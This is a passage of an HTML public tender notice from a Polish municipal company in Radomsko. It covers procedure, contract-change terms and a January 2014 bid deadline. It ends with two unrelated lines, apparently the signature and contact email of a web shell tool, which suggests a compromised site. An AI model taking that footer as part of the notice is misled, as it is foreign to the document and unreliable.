    Z zobowiązania podmiotu trzeciego do udostępnienia Wykonawcy zasobów winny 
    wynikać następujące okoliczności:
  - jaki jest zakres dostępnych zasobów,
  - jaki będzie sposób ich wykorzystania przy wykonywaniu zamówienia,
  - charakter stosunku, który będzie łączył Wykonawcę z innym podmiotem,
  - jaki jest zakres i czas udziału innego podmiotu przy realizacji zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość wprowadzenia istotnych zmian do umowy w 
    przypadku gdy konieczność zmiany, w tym w zakresie wysokości wynagrodzenia, 
    związana jest ze zmianą powszechnie obowiązujących przepisów prawa ( np. w zakresie 
    zmiany wysokości stawki podatku VAT ).   
   W przypadku zmiany wysokości obowiązującej stawki podatku VAT, wynagrodzenie netto  
    pozostanie bez zmian. Kwota brutto zostanie obliczona na podstawie stawki tego podatku 
    obowiązującej w chwili powstania obowiązku podatkowego.
2. Zamawiający dopuszcza możliwość wprowadzenia zmian w treści umowy w przypadku 
     zaistnienia okoliczności niemożliwych do przewidzenia w dniu zawarcia umowy jedynie
     w przypadku zaistnienia następujących okoliczności:
wystąpienia konieczności zmiany terminu realizacji robót ze względu na:
 -  zmiany spowodowane warunkami geologicznymi, archeologicznymi lub terenowymi,
 -  konieczność usunięcia błędów lub wprowadzenia zmian w dokumentacji;
 -  wstrzymania przez Zamawiającego wykonania robót;
 -  w przypadku wystąpienia niekorzystnych warunków atmosferycznych, lub innych
    nieprzewidzianych przeszkód uniemożliwiających prowadzenie robót zgodnie z 
    wymaganiami technicznymi określonymi w SIWZ oraz STWiORB;
 -  klęskę żywiołową;	
 -  siłę wyższą.
3. Każda zmiana postanowień niniejszej umowy wymaga formy pisemnej w postaci aneksu 
    pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pgk-radomsko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedsiębiorstwo Gospodarki Komunalnej Sp. z o.o.
97-500 Radomsko, ul. Stara Droga 85
pokój 217.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.01.2014 godzina 13:00, miejsce: Sekretariat Przedsiębiorstwa Gospodarki Komunalnej Sp. z o.o.
97-500 Radomsko, ul. Stara Droga 85.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com